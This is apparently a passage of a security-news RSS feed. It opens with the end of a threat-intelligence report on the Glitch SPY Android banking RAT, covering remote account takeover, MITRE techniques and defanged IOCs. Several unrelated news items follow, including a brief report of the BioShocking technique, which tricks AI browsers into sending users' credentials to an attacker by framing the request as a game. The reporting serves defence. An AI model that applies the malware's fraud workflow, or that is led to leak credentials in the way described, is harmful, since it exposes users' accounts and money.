<p>When combined with screen streaming, keylogging, screen-reader extraction, clipboard monitoring, and Accessibility-based input, the remote browser capability provides a complete workflow for web-based account takeover and transaction manipulation from the infected device itself.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121457,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-11-%E2%80%93-Commands-to-control-WebView-sessions.png" alt="" class="wp-image-121457"><figcaption class="wp-element-caption"><em>Figure 11 – Commands to control WebView sessions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The feature can let attacker-controlled web activity originate from the victim’s own device rather than from external attacker infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This means the attacker's web activity originates from the victim's IP, with the victim's cookies and any active authenticated sessions intact — making it harder for banks or crypto platforms to flag the login as suspicious.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In fraud scenarios, this may allow attackers to interact with login pages, financial portals, cryptocurrency services, email accounts, or other web applications from the victim’s environment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY is a capable, actively developing Android threat combining surveillance, remote control, financial fraud, and account takeover within a single platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Its use of the established Brokewell loader for delivery, its abuse of the Accessibility Service to automate permission grants after a single user action, and its Builder, Dropper, and payload-management modules indicate a TA investing in a reusable framework rather than a one-off campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder's per-payload configuration options (custom name, icon, package ID, and decoy WebView URL) mean retargeting for a new region or lure requires no code changes.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While the current activity appears targeted at users searching for rental properties in Poland, one recovered APK and two identified C&amp;C panel URLs suggest early-stage distribution. The "Coming soon" Cryptor module and active panel development indicate the platform is still expanding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Users should avoid installing APKs from outside official app stores. The loader's first action is requesting permission to install from unknown sources; denying it stops the payload before it installs.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Any app that requests Accessibility Service or installs from unknown sources should be treated as suspicious. Keep Google Play Protect enabled.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Our Recommendations</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>We have listed some essential <a href="https://cyble.com/knowledge-hub/what-is-cybersecurity/">cybersecurity</a> best practices that serve as the first line of defense against attackers. We recommend that our readers follow the best practices given below:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Install Apps Only from Trusted Sources:</strong><br>Download apps exclusively from official platforms, such as the <a href="https://cyble.com/blog/crypto-phishing-applications-on-the-play-store/">Google Play Store</a>. Avoid third-party app stores or links received via SMS, social media, or email.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Be Cautious with Permissions and Installs:</strong><br>Never grant permissions and install an application unless you're certain of an app's legitimacy.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Watch for Phishing Pages:</strong><br>Always verify the URL and avoid suspicious links and websites that ask for sensitive information.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Enable Multi-Factor Authentication (MFA):</strong><br>Use MFA for banking and financial apps to add an extra layer of protection, even if credentials are compromised.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Report Suspicious Activity:</strong><br>If you suspect you've been targeted or infected, report the incident to your bank and local authorities immediately. If necessary, reset your credentials and perform a factory reset.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Use Mobile Security Solutions:</strong><br>Install a mobile security application that includes real-time scanning.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Keep Your Device Updated:</strong><br> Ensure your Android OS and apps are updated regularly. Security patches often address vulnerabilities exploited by malware.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Tactic</strong></td>
<td><strong>Technique ID</strong></td>
<td><strong>Procedure</strong></td>
</tr>
<tr>
<td>Initial Access (<a href="https://attack.mitre.org/tactics/TA0027">TA0027</a>)</td>
<td>Phishing (<a href="https://attack.mitre.org/techniques/T1660/">T1660</a>)</td>
<td>Glitch SPY is distributed via phishing sites</td>
</tr>
<tr>
<td>Persistence (<a href="https://attack.mitre.org/tactics/TA0028">TA0028</a>)</td>
<td>Event Triggered Execution: Broadcast Receivers (T1624.001)</td>
<td>Glitch SPY implemented a broadcast receiver for screen capturing</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Impair Defenses: Prevent Application Removal (T1629.001)</td>
<td>Prevent uninstalling application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)<strong></strong></td>
<td>Hide Artifacts: Suppress Application Icon (<a href="https://attack.mitre.org/techniques/T1628/001/">T1628.001</a>)</td>
<td>Glitch SPY hides its icon</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Masquerading: Match Legitimate Name or Location (<a href="https://attack.mitre.org/techniques/T1655/001/">T1655.001</a>)</td>
<td>Glitch SPY masquerades as a Polish rental application</td>
</tr>
<tr>
<td>Defense Evasion (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Input Injection (T1516)</td>
<td>Glitch SPY can perform actions such as Clicks, swipes, gestures, and enter text into edit fields.</td>
</tr>
<tr>
<td>Credential Access (<a href="https://attack.mitre.org/tactics/TA0030">TA0030</a>)</td>
<td>Abuse Accessibility Features (<a href="https://attack.mitre.org/techniques/T1453/">T1453</a>)</td>
<td>Glitch SPY abuses Accessibility service</td>
</tr>
<tr>
<td><strong> </strong></td>
<td>Input Capture: Keylogging (<a href="https://attack.mitre.org/techniques/T1417/001/">T1417.001</a>)</td>
<td>Glitch SPY includes a Keylogging module  </td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Software Discovery  (<a href="https://attack.mitre.org/techniques/T1418/">T1418</a>)</td>
<td>Glitch SPY collects installed applications</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>File and Directory Discovery (<a href="https://attack.mitre.org/techniques/T1420/">T1420</a>)</td>
<td>Glitch SPY can enumerate files from external storage</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>Location Tracking (<a href="https://attack.mitre.org/techniques/T1430/">T1430</a>)</td>
<td>Glitch SPY can collect device location</td>
</tr>
<tr>
<td>Discovery (<a href="https://attack.mitre.org/tactics/TA0032">TA0032</a>)</td>
<td>System Information Discovery (<a href="https://attack.mitre.org/techniques/T1426/">T1426</a>)</td>
<td>Glitch SPY can collect device information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Archive Collected Data (<a href="https://attack.mitre.org/techniques/T1532/">T1532</a>)  </td>
<td>Glitch SPY compresses the external storage directories as a zip file before sending</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Screen Capture (<a href="https://attack.mitre.org/techniques/T1513/">T1513</a>)</td>
<td>Glitch SPY captures screen content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Audio Capture (<a href="https://attack.mitre.org/techniques/T1429/">T1429</a>)</td>
<td>Glitch SPY can capture Audio</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Clipboard Data (T1414)</td>
<td>Malware can monitor Clipboard content</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Data from Local System (<a href="https://attack.mitre.org/techniques/T1533/">T1533</a>)</td>
<td>Malware collects encrypted files from external storage</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Contact List (<a href="https://attack.mitre.org/techniques/T1636/003/">T1636.003</a>)</td>
<td>Malware collects contact details</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: SMS Messages (<a href="https://attack.mitre.org/techniques/T1636/004/">T1636.004</a>)</td>
<td>Glitch SPY collects SMS data</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Accounts (<a href="https://attack.mitre.org/techniques/T1636/005/">T1636.005</a>)</td>
<td>Malware collects Account information</td>
</tr>
<tr>
<td>Collection (<a href="https://attack.mitre.org/tactics/TA0035">TA0035</a>)</td>
<td>Protected User Data: Call Log (<a href="https://attack.mitre.org/techniques/T1636/002/">T1636.002</a>)</td>
<td>Glitch SPY collects Call logs</td>
</tr>
<tr>
<td>Command &amp; Control (<a href="https://attack.mitre.org/tactics/TA0037">TA0037</a>)</td>
<td>Application Layer Protocol (<a href="https://attack.mitre.org/techniques/T1437/">T1437</a>)</td>
<td>Glitch SPY communicates with C2 over TCP</td>
</tr>
<tr>
<td>Exfiltration (<a href="https://attack.mitre.org/tactics/TA0036">TA0036</a>)</td>
<td>Exfiltration Over C2 Channel (<a href="https://attack.mitre.org/techniques/T1646/">T1646</a>)</td>
<td>Glitch SPY exfiltrates data to the C&amp;C server</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Encrypted for Impact (<a href="https://attack.mitre.org/techniques/T1471/">T1471</a>)</td>
<td>Malware encrypts all the files present on the device with the .enc extension</td>
</tr>
<tr>
<td>Impact (<a href="https://attack.mitre.org/tactics/TA0034">TA0034</a>)</td>
<td>Data Destruction (<a href="https://attack.mitre.org/techniques/T1662/">T1662</a>)</td>
<td>Glitch SPY deletes all plain-text files after encryption</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs)<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Indicators</strong></td>
<td><strong>Indicator type</strong></td>
<td><strong>Description</strong></td>
</tr>
<tr>
<td>hxxps://tutaj-dompl[.]com/Tutajdom.apk</td>
<td>URL</td>
<td>Distribution URL</td>
</tr>
<tr>
<td>sportypointsrewards[.]com</td>
<td>Domain</td>
<td>C&amp;C server</td>
</tr>
<tr>
<td>80af5e921cf8a3052fe4483bb2eb15953590e72ed003ac61c0b9135575c32075</td>
<td>FileHash-SHA256</td>
<td>Glitch SPY Hash</td>
</tr>
<tr>
<td>d439475bf09af7b474cdba2c19e136a1dd38e62b088537445ac3c8e4c2d3a8b1</td>
<td>FileHash-SHA256</td>
<td>Brokewell Loader</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/glitch-spy-rat-distributed-via-fake-polish-app/">Glitch SPY: An Emerging Android RAT Distributed Through a Fake Polish Rental App</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New BioShocking Attack Tricks AI Browsers Into Leaking User Credentials]]></title>
<description><![CDATA[Convince an AI browser that it is playing a game, and it can hand over your login details. That is the finding behind BioShocking, a technique from security firm LayerX that tricked six AI browsers and assistants into copying a user's credentials and sending them to an attacker.

The targets incl...]]></description>
<link>https://tsecurity.de/de/3635044/it-security-nachrichten/new-bioshocking-attack-tricks-ai-browsers-into-leaking-user-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635044/it-security-nachrichten/new-bioshocking-attack-tricks-ai-browsers-into-leaking-user-credentials/</guid>
<pubDate>Tue, 30 Jun 2026 11:23:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Convince an AI browser that it is playing a game, and it can hand over your login details. That is the finding behind BioShocking, a technique from security firm LayerX that tricked six AI browsers and assistants into copying a user's credentials and sending them to an attacker.

The targets included OpenAI's ChatGPT Atlas, Perplexity's Comet, and Anthropic's Claude browser extension.

An]]></content:encoded>
</item>
<item>
<title><![CDATA[Five tools to bolster your AI coding stack]]></title>
<description><![CDATA[Whether you are using an AI code generator, vibe coding, or applying spec-driven development methodologies, your job doesn’t end with AI writing the code. Whether you’re using AI to develop applications, APIs, data pipelines, AI agents, or other automations, writing the code is just one part of t...]]></description>
<link>https://tsecurity.de/de/3635032/ai-nachrichten/five-tools-to-bolster-your-ai-coding-stack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635032/ai-nachrichten/five-tools-to-bolster-your-ai-coding-stack/</guid>
<pubDate>Tue, 30 Jun 2026 11:18:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Whether you are using an <a href="https://www.infoworld.com/article/4032989/a-developers-guide-to-code-generation.html">AI code generator</a>, <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, or applying <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development</a> methodologies, your job doesn’t end with AI writing the code. Whether you’re using AI to develop applications, APIs, <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data pipelines</a>, <a href="https://www.infoworld.com/article/4105884/10-essential-release-criteria-for-launching-ai-agents.html">AI agents</a>, or other automations, writing the code is just one part of the job. Developers must still perform code validation, test applications, automate deployment, and configure infrastructure.</p>



<p>According to <a href="https://www.infoworld.com/article/3831759/developers-spend-most-of-their-time-not-coding-idc-report.html">one survey</a>, only 16% of a developer’s time is spent writing code. The remaining 84% is spent on <a href="https://www.atlassian.com/blog/ai-at-work/beyond-the-jira-board-how-autonomous-workflows-unlock-engineering-velocity">other activities</a> including defining requirements, triaging bugs, and addressing vulnerabilities.</p>



<p>Additionally, while AI code generation speeds up development, it can come at the cost of quality and collaboration. In Atlassian’s <a href="https://www.atlassian.com/blog/state-of-teams-2026">State of Teams 2026</a> survey, nearly 50% of respondents say their AI outputs aren’t reliably high quality and admit that using AI is a compromise between speed and quality. Knowledge workers say the pressure to execute is also problematic, with 87% saying they lack time to coordinate and 70% saying their processes aren’t well-optimized for AI.</p>



<p>So, although AI capabilities have changed drastically in the past few years, code-generation tools are not the only ways <a href="https://www.infoworld.com/article/3993479/what-we-know-now-about-generative-ai-for-software-development.html">AI can improve software development</a>. In fact, developers should seek additional AI capabilities to support the full software development life cycle (SDLC). Here are five recommendations for the AI coding stack. </p>



<h2 class="wp-block-heading">Scale up testing environments</h2>



<p>If coding is faster, development teams should have suitably configured environments that they can use to quickly and easily test changes against real APIs and databases. Testing apps and AI agents against environments that don’t mimic production can slow down development. </p>



<p><a href="https://metalbear.com/mirrord/docs/use-cases/local-development" data-type="link" data-id="https://metalbear.com/mirrord/docs/use-cases/local-development">“Remote + local” development environments</a> (local execution with remote context) are one option to accelerate testing. Developers can code locally on their own physical or virtual machine, but build and deploy to remote instances. Additionally, when developing AI agents, developers need an execution environment, such as secure sandboxes or ephemeral virtual machines.</p>



<p>“GenAI has been a step-change for developer productivity, absorbing the repetitive work of writing boilerplate, tests, and refactors so engineers can focus on intent and design,” says Aviram Hassan, CEO and cofounder at <a href="https://metalbear.com/">MetalBear</a>. “But by compressing the time it takes to produce all of this, genAI has also exposed what’s always been the real bottleneck in the SDLC: the feedback loop against the real world. Validating code and configurations against a realistic cloud environment still depends on the same slow build-and-deploy cycles teams have tolerated for years.”</p>



<p>The goal should be to remove the friction and delays from where developers code to a complete, real-world infrastructure they can use to validate changes. Three tools to review are <a href="https://metalbear.com/mirrord/">mirrord</a>, <a href="https://www.signadot.com/">Signadot</a>, and <a href="https://telepresence.io/">Telepresence</a>.</p>



<h2 class="wp-block-heading">Validate the AI-generated code</h2>



<p>At a recent <a href="https://drive.starcio.com/coffee-with-digital-trailblazers/">Coffee With Digital Trailblazers</a> LinkedIn Live event that I hosted on <a href="https://drive.starcio.com/podcast/ai-coding-competencies-hype-realities-and-the-future/">AI coding competencies</a>, one speaker shared how he quickly went from a short spec to more than 10,000 lines of AI-generated code. He admitted he didn’t have the time, expertise, or tools to validate the code. He’s not alone. In Sonar’s <a href="https://www.sonarsource.com/resources/developer-survey-report/">State of Code Developer Survey</a>, 96% of developers don’t fully trust AI’s output, but only 48% always verify it before committing.</p>



<p>“Agentic software development is generating code faster than any team can manually review it, but speed without confidence only results in technical debt,” says Scott Sanders, corporate vice president of engineering at <a href="https://www.sonarsource.com/">Sonar</a>. “What’s needed to avoid this is an automated independent verification layer embedded directly into the development workflow—one that unifies code quality and code security into a single, deterministic platform to deliver actionable intelligence before code ever reaches the repository.”</p>



<p>A big concern is that AI-generated code can produce 1.4 times as many critical issues as code created by developers, according to CodeRabbit’s <a href="https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report">State of AI Versus Human Code Generation Report</a>. Top issues include code readability, cross-site scripting, code formatting errors, and incorrect concurrency control.</p>



<p>Another challenge is that 82.4% of AI tools originate from third-party packages, according to Snyk’s <a href="https://snyk.io/lp/state-of-agentic-ai-adoption/">2026 State of Agentic AI Adoption</a>. The implication is that development teams have much more code to validate than they develop themselves, whether by humans or AI code generators.</p>



<p>“When tools like Cursor are installing dependencies and running actions on a developer’s behalf, they can unintentionally pull in malicious or unvetted packages,” says Randall Degges, vice president of AI engineering and developer relations at <a href="https://snyk.io/">Snyk</a>. “That’s why techniques like intercepting tool calls, validating inputs and outputs, enforcing least-privilege access, and isolating credentials are becoming foundational to how AI-driven development systems operate. Without security embedded directly into the agent loop, teams risk shipping faster into more exposure, not less.”</p>



<p>According to Qodo’s report on <a href="https://www.qodo.ai/resources/the-ai-coding-paradox/">The AI Coding Paradox</a>, 89% of enterprise engineering teams have experienced an AI-generated code incident and have had a production outage caused by AI-generated code. Development teams building a large portfolio of AI agents or heavily relying on AI code-generation capabilities may want to look at AI code-review tools that provide more contextual analysis than basic static code review tools.</p>



<p>“Current AI coding assistants suffer from a severe amnesia problem, and each session starts without memory of an organization’s unique context, subjective standards, and business logic,” says Itamar Friedman, CEO and cofounder at <a href="https://qodo.ai/">Qodo</a>. “To safely scale AI, it requires integrating stateful systems equipped with persistent organizational memory that continuously learn from past pull requests and automatically enforce enterprise-specific governance. Ultimately, developers need tools that ensure code is guided by continuously learning organizational experience rather than just raw machine-generated code.”</p>



<p>Tools to review include static application security testing (SAST), software composition analysis (SCA), software bill of materials (SBOM), and AI code review tools.</p>



<h2 class="wp-block-heading">Security and end-to-end testing</h2>



<p>Even when AI-generated code passes all the tests, how can devops teams validate whether it meets business and <a href="https://www.infoworld.com/article/4061123/how-to-write-nonfunctional-requirements-for-ai-agents.html">non-functional technical requirements</a>? Many devops teams have invested in <a href="https://www.infoworld.com/article/3705049/3-ways-to-upgrade-continuous-testing-for-generative-ai.html">continuous testing</a>, and some support <a href="https://www.infoworld.com/article/3663055/are-you-ready-to-automate-continuous-deployment-in-cicd.html">continuous deployment</a>, but the underlying assumptions behind those practices are being challenged now by who is coding and how much code is being generated. </p>



<p>Some spec-driven development platforms aim to bridge the gap. Tools like <a href="https://docs.appian.com/suite/help/26.4/plan-view.html">Appian Composer</a> and <a href="https://www.sap.com/products/artificial-intelligence/joule-studio.html">SAP Joule Studio 2.0</a> generate product requirements documents (PRDs) before coding, enabling the introduction of business acceptance criteria. These tools create knowledge graphs from the business processes implemented on their platforms and provide environments for validating AI agents before deployment.</p>



<p>“For most organizations, the AI code-generation methodology question matters less than the verification question,” says Gal Vered, CEO and cofounder at <a href="https://checksum.ai/">Checksum.ai</a>.  “Whether your team is prompting from intent or working from specs, AI-generated code still needs to be validated against a production environment before it ships.”</p>



<p>Beyond functional testing, developers must look at new security concerns, especially as AI agents integrate with <a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">Model Context Protocol servers</a>. “Most teams are stacking generation tools on top of review tools and on top of testing tools, but without security validation embedded at every stage, you’re just automating the path to your next breach,” says Harshit Agarwal, CEO at <a href="https://www.appknox.com/">Appknox</a>. “Mature teams treat security feedback as a non-negotiable part of the build loop, running automated checks continuously rather than catching issues after the fact.”</p>



<h2 class="wp-block-heading">Add observability tools </h2>



<p>Developers save an average of 3.6 hours per week with AI coding tools, <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/#developers-save-an-average-of-36-hours-per-week-with-ai-coding-tools">according to one report</a>, and the more experienced engineers achieve the largest productivity gains.</p>



<p>What’s one way to blow these savings? When defects get pushed to production, it’s often the <a href="https://www.infoworld.com/article/3689881/career-paths-for-devops-engineers-and-sres.html">site reliability engineers</a> and senior developers who are left to triage and resolve the issue. Establishing <a href="https://www.infoworld.com/article/3686056/best-practices-for-devops-observability.html">observability practices</a> as a <a href="https://drive.starcio.com/2025/01/important-devsecops-non-negotiables/">devops non-negotiable</a> is a development investment that pays off significantly to help diagnose issues, resolve errors, and improve performance.</p>



<p>“In data and AI systems, even small changes like model updates, tool decisions, or shifts in data flow can silently cascade into issues no one anticipated, and the AI agent has no way to know that,” says Barr Moses, cofounder and CEO at <a href="https://www.montecarlodata.com/">Monte Carlo</a>. “Leading teams are addressing this by embedding observability across the entire agentic stack, particularly at precommit checkpoints, so agents can surface the true impact of changes before they go live.”</p>



<p>While many devops teams have mature observability practices for APIs, applications, and data integrations, <a href="https://www.infoworld.com/article/4140832/7-safeguards-for-observable-ai-agents.html">observability practices for AI agents</a> are relatively new. One technique to consider is <a href="https://www.montecarlodata.com/blog-best-ai-observability-tools/">AI tracing platforms</a> with notation queues for human review and <a href="https://www.evidentlyai.com/llm-guide/llm-as-a-judge">LLM-as-judge</a> evals. A second option is to implement an <a href="https://startupstash.com/top-ai-gateways/">AI gateway</a> with observability, caching, routing, and cost-tracking capabilities.</p>



<h2 class="wp-block-heading">Develop reusable agent skills</h2>



<p>One last element of the AI stack, especially for organizations heavily investing in AI agent development, is to adopt best practices for developing reusable skills embedded in code-generating tools.</p>



<p>“A key emerging pattern is purpose-built AI skills: reusable, scoped instructions that give agents deep context for specific tasks, rather than relying on general-purpose prompting alongside antagonist agents that challenge other agents’ outputs,” says Phillip Goericke, CTO of <a href="https://www.nmi.com/">NMI</a>. “The defining shift is that developers are no longer writing code with AI assistance—they’re architecting the systems that produce and validate it.”</p>



<p>Development organizations that leverage code-generation tools are recognizing that coding is just one part of delivering <a href="https://drive.starcio.com/2026/02/why-chaotic-ai-experiments-arent-producing-business-value/">business value from AI</a> and <a href="https://www.infoworld.com/article/4105884/10-essential-release-criteria-for-launching-ai-agents.html">resilient AI agents</a>. Developing AI skills and establishing an AI stack are steps toward scaling to a dependable AI software development life cycle.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gefälschte Perplexity-Erweiterung im Chrome Web Store: Suchanfragen landeten bei Angreifern]]></title>
<description><![CDATA[REDMOND / LONDON (IT BOLTWISE) – Microsoft warnt vor einer bösartigen Chrome-Erweiterung, die sich als KI-Suchmaschine Perplexity ausgab und dennoch im Hintergrund Suchanfragen sowie Eingaben in der Adressleiste über einen Angreifer-Server abfing. Laut Microsoft leitete die Malware jede Anfrage u...]]></description>
<link>https://tsecurity.de/de/3634839/it-security-nachrichten/gefaelschte-perplexity-erweiterung-im-chrome-web-store-suchanfragen-landeten-bei-angreifern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634839/it-security-nachrichten/gefaelschte-perplexity-erweiterung-im-chrome-web-store-suchanfragen-landeten-bei-angreifern/</guid>
<pubDate>Tue, 30 Jun 2026 09:35:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-chrome-malicious-perplexity-extension-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">REDMOND / LONDON (IT BOLTWISE) – Microsoft warnt vor einer bösartigen Chrome-Erweiterung, die sich als KI-Suchmaschine Perplexity ausgab und dennoch im Hintergrund Suchanfragen sowie Eingaben in der Adressleiste über einen Angreifer-Server abfing. Laut Microsoft leitete die Malware jede Anfrage und sogar Zeichen aus der Adresszeile zuerst auf eine look-alike Domain um, bevor sie Nutzer zu […]</p>
<div><a href="https://www.it-boltwise.de/gefaelschte-perplexity-erweiterung-im-chrome-web-store-suchanfragen-landeten-bei-angreifern.html">... den vollständigen Artikel <strong>»Gefälschte Perplexity-Erweiterung im Chrome Web Store: Suchanfragen landeten bei Angreifern«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/gefaelschte-perplexity-erweiterung-im-chrome-web-store-suchanfragen-landeten-bei-angreifern.html">Gefälschte Perplexity-Erweiterung im Chrome Web Store: Suchanfragen landeten bei Angreifern</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oura Ring 5 review: a stunning generational leap for smart rings]]></title>
<description><![CDATA[Slimmer, longer lasting and much easier to live with, new Oura sets a very high new bar for health-tracking wearablesOura’s new Ring 5 is a massive upgrade for smart rings, dramatically shrinking in size and weight to bring them right into line with standard wedding bands and other jewellery. It ...]]></description>
<link>https://tsecurity.de/de/3634809/it-nachrichten/oura-ring-5-review-a-stunning-generational-leap-for-smart-rings/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634809/it-nachrichten/oura-ring-5-review-a-stunning-generational-leap-for-smart-rings/</guid>
<pubDate>Tue, 30 Jun 2026 09:17:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Slimmer, longer lasting and much easier to live with, new Oura sets a very high new bar for health-tracking wearables</p><p>Oura’s new Ring 5 is a massive upgrade for smart rings, dramatically shrinking in size and weight to bring them right into line with standard wedding bands and other jewellery. It is finally a smart ring you can genuinely forget you’re wearing.</p><p>The Ring 5 is a straight replacement for the <a href="https://www.theguardian.com/technology/2024/oct/15/oura-ring-4-review-best-smart-ring-battery-upgrade">popular Ring 4</a> and costs from £399 (€399/$399/$A649), though it requires a £5.99 (€5.99/$5.99/A$9.99) a month subscription to access anything but basic daily metrics. An Oura is not a cheap proposition.</p> <a href="https://www.theguardian.com/technology/2026/jun/30/oura-ring-5-review-smart-ring-health-tracking">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Malicious Chromium Extension Spoofs Perplexity AI to Hijack Browser Searches]]></title>
<description><![CDATA[A malicious Chromium extension that impersonated the Perplexity AI brand to intercept browser searches and capture keystrokes before delivering users to legitimate search results. The extension, listed as “Search for perplexity ai” (ID flkebkiofojicogddingbdmcmkpbplcd, version 2.2), used Manifest...]]></description>
